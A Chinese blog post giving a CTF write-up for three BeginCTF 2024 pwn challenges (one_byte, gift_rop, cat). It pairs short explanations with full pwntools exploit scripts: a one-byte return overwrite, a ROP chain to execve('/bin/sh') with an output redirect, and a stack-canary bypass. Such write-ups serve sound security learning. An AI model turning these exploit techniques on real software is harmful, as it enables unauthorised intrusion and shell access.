feichai's Blog
0%

BeginCTF 2024 Pwn部分wp

发表于 更新于 分类于
本文字数: 3.3k 阅读时长 ≈ 3 分钟

本Pwn小白实力不允许,只写出了几道稍微简单点的

one_byte

溢出只能覆盖返回地址的一个字节,利用溢出,修改返回地址返回主函数继续读出flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
from struct import pack
from LibcSearcher import *
from ae64 import AE64
import base64
from ctypes import *

debug = 0
if debug:
    p = process('/home/feichai/ctf_file/pwn')
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    p = remote('0.0.0.0', 8888)
    libc=ELF("/home/feichai/ctf_file/libc.so.6")

#context(arch="amd64",os="linux",log_level="debug")
elf=ELF("/home/feichai/ctf_file/chal")
libcc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

def pwn():
    
    flag = ''
    for i in range(100):
        
        p.recvuntil(b"your gift: ")
        flag += p.recv(1).decode()
        pd = b'\x90' * 17 + b'\x63'
        p.sendafter(b"result?",pd)
        
        print(flag)

if __name__=='__main__':
    pwn()

gift_rop

gadget都留着,直接ret2syscall就可以get shell,因为关闭了标准输出和标准错误,重定向就可以看到输出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import *
from struct import pack
from LibcSearcher import *
from ae64 import AE64
import base64
from ctypes import *

debug = 0
if debug:
    p = process('/home/feichai/ctf_file/gift_rop')
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    p = remote('0.0.0.0', 8888)
    libc=ELF("/home/feichai/ctf_file/libc.so.6")

context(arch="amd64",os="linux",log_level="debug")
elf=ELF("/home/feichai/ctf_file/gift_rop")
libcc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

binsh = 0x00000000004c50f0
pop_rdi = 0x0000000000401f2f
pop_rsi = 0x0000000000409f9e
syscall = 0x401CE4
pop_rdx_rbx =0x000000000047f20b
ret = 0x000000000043d1d0
'''
0x000000000040239e : xor eax, eax ; ret
0x00000000004019d6 : add eax, 1 ; ret
0x0000000000471268 : add eax, 2 ; ret
0x0000000000471281 : add eax, 3 ; ret
'''
xor_eax = 0x000000000040239e
add_eax_3= 0x0000000000471281
add_eax_2= 0x0000000000471268
def pwn():

    #execve 59   eax = 59  rdi = "/bin/sh\x00"  rsi = 0  rdx = 0
    pd = b'\x90'*0x28
    pd += p64(pop_rdi) + p64(binsh)
    pd += p64(pop_rdx_rbx) + p64(0) + p64(0)
    pd += p64(pop_rsi) + p64(0)
    pd += p64(xor_eax)
    pd += p64(add_eax_3) * 19
    pd += p64(add_eax_2)

    pd += p64(syscall)

    p.sendafter(b"checkin problem.",pd)
    sleep(0.1)
    p.sendline(b'exec 1>&0')
    
    p.interactive() 

if __name__=='__main__':
    pwn()

cat

strcat会在字符串后面继续添加字符串,strcpy在复制字符串后会自动加’\0’,利用这两个特性,在vul函数中先将canary的最低位字节\x00覆盖掉,然后strcat就可以绕过canary修改返回地址,最后strcpy会将canary最后一字节恢复为\x00,程序结束返回system

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
from struct import pack
from LibcSearcher import *
from ae64 import AE64
import base64
from ctypes import *

debug = 0
if debug:
    p = process('/home/feichai/ctf_file/pwn')
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    p = remote('0.0.0.0', 8888)
    libc=ELF("/home/feichai/ctf_file/libc.so.6")

context(arch="amd64",os="linux",log_level="debug")
elf=ELF("/home/feichai/ctf_file/chal")
libcc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

system = 0x4011FE
ret = 0x000000000040101a

def pwn():
    
    pd = b'a' * 2 + p64(system)
    p.sendafter(b"read:",pd)
    pd = b'a' * 0x18
    p.sendafter(b"read:",pd)
    pd = b'a' * 0x39
    p.sendafter(b"read:",pd)

    p.interactive() 

if __name__=='__main__':
    pwn()
-------------本文结束感谢您的阅读-------------

欢迎关注我的其它发布渠道